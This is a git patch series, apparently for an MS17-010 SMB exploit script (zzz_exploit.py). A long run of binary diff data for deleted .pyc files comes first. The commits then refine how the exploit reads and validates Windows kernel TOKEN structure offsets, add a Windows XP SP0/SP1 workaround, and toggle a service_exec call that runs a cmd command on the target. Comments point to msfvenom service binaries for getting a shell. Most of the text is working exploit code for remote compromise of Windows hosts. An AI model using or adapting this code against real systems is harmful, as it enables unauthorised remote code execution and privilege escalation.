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 L0!J5ziv#})ezMr2 literal 0 HcmV?d00001 diff --git a/zzz_exploit.py b/zzz_exploit.py index e9f5996..41f81b8 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -867,15 +867,19 @@ def exploit(target, pipe_name): # copy Token data for restoration tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE']) - userAndGroupCount = unpack_from(' 4: + if userAndGroupCount > 4 or userAndGroupCount == 0: # check NULL too print("Bad TOKEN offsets detected, performing workaround") - userAndGroupCount = unpack_from(' Date: Mon, 29 Jan 2018 18:55:22 -0700 Subject: [PATCH 5/9] remove pyc again... needs a gitignore maybe --- mysmb.pyc | Bin 16693 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 mysmb.pyc diff --git a/mysmb.pyc b/mysmb.pyc deleted file mode 100644 index c72fbe7fd06d08f3ed4276e128df596f68984605..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16693 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 L0!J5ziv#})ezMr2 From 8bd6f3760f76c1fdba0c46b07ef788b3cf425563 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 22:34:40 -0700 Subject: [PATCH 6/9] test restricted SID values instead of group count --- zzz_exploit.py | 69 ++++++++++++++++++++++++++++++++++++++------------ 1 file changed, 53 insertions(+), 16 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 41f81b8..5c6c2c7 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -867,21 +867,8 @@ def exploit(target, pipe_name): # copy Token data for restoration tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE']) - - userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET'] - userAndGroupCount = unpack_from(' 4 or userAndGroupCount == 0: # check NULL too - print("Bad TOKEN offsets detected, performing workaround") - userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'] - userAndGroupCount = unpack_from('= x + if RestrictedSids != 0 or RestrictedSidCount != 0: + print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!') + print('RestrictedSids: 0x{:x}'.format(RestrictedSids)) + print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount)) + success = False + + print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount)) + print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr)) + + return success, userAndGroupCount, userAndGroupsAddr + +def get_group_data_from_token(info, tokenData): + userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET'] + userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET'] + + # try with default offsets + success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset) + + # hack to fix XP SP0 and SP1 + # I will avoid over-engineering a more elegant solution and leave this as a hack, + # since XP SP0 and SP1 is the only edge case in a LOT of testing! + if not success and info['os'] == 'WINXP' and info['arch'] == 'x86': + print('Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround') + + userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'] + userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'] + + # try with hack offsets + success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset) + + # still no good. Abort because something is wrong + if not success: + print('Bad TOKEN_USER_GROUP offsets. Abort > BSOD') + sys.exit() + + # token parsed and validated + return userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() @@ -931,7 +967,7 @@ def smb_pwn(conn, arch): smbConn.disconnectTree(tid2) #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') - #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session # a simple method to get shell (but easily to be detected by AV) is # executing binary generated by "msfvenom -f exe-service ..." @@ -1008,3 +1044,4 @@ pipe_name = None if len(sys.argv) < 3 else sys.argv[2] exploit(target, pipe_name) print('Done') + From f611d0e5da62854284c1e5ec52b73643af20e436 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 22:36:36 -0700 Subject: [PATCH 7/9] comment out service_exec --- zzz_exploit.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 5c6c2c7..f363c9b 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -967,7 +967,7 @@ def smb_pwn(conn, arch): smbConn.disconnectTree(tid2) #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') - service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session # a simple method to get shell (but easily to be detected by AV) is # executing binary generated by "msfvenom -f exe-service ..." From 42af710431c9f48b3a9d1835e0b288fc46daec38 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 23:54:47 -0700 Subject: [PATCH 8/9] added additional 0 checks and struct notes --- zzz_exploit.py | 25 ++++++++++++++++++------- 1 file changed, 18 insertions(+), 7 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index f363c9b..3ea607f 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -908,18 +908,29 @@ def exploit(target, pipe_name): return True def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset): + # struct _TOKEN: + # ... + # ULONG UserAndGroupCount; // Ro: 4-Bytes + # ULONG RestrictedSidCount; // Ro: 4-Bytes + # ... + # PSID_AND_ATTRIBUTES UserAndGroups; // Wr: sizeof(void*) + # PSID_AND_ATTRIBUTES RestrictedSids; // Ro: sizeof(void*) + # ... - RestrictedSidCount = unpack_from('= x success = True - # RestrictedSids and RestrictedSidCount MUST be 0 - # Could also add a failure point here if userAndGroupCount >= x - if RestrictedSids != 0 or RestrictedSidCount != 0: + if RestrictedSidCount != 0 or RestrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0: print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!') print('RestrictedSids: 0x{:x}'.format(RestrictedSids)) print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount)) From 59de6a0e13653d57ea21d26b76388bc4204ae75b Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Tue, 30 Jan 2018 00:27:48 -0700 Subject: [PATCH 9/9] small typo in doc --- zzz_exploit.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 3ea607f..2c49b3e 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -924,7 +924,7 @@ def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroup # RestrictedSids MUST be NULL # # userandGroupCount must NOT be 0 - # userandGroupAddr must NOT be NULL + # userandGroupsAddr must NOT be NULL # # Could also add a failure point here if userAndGroupCount >= x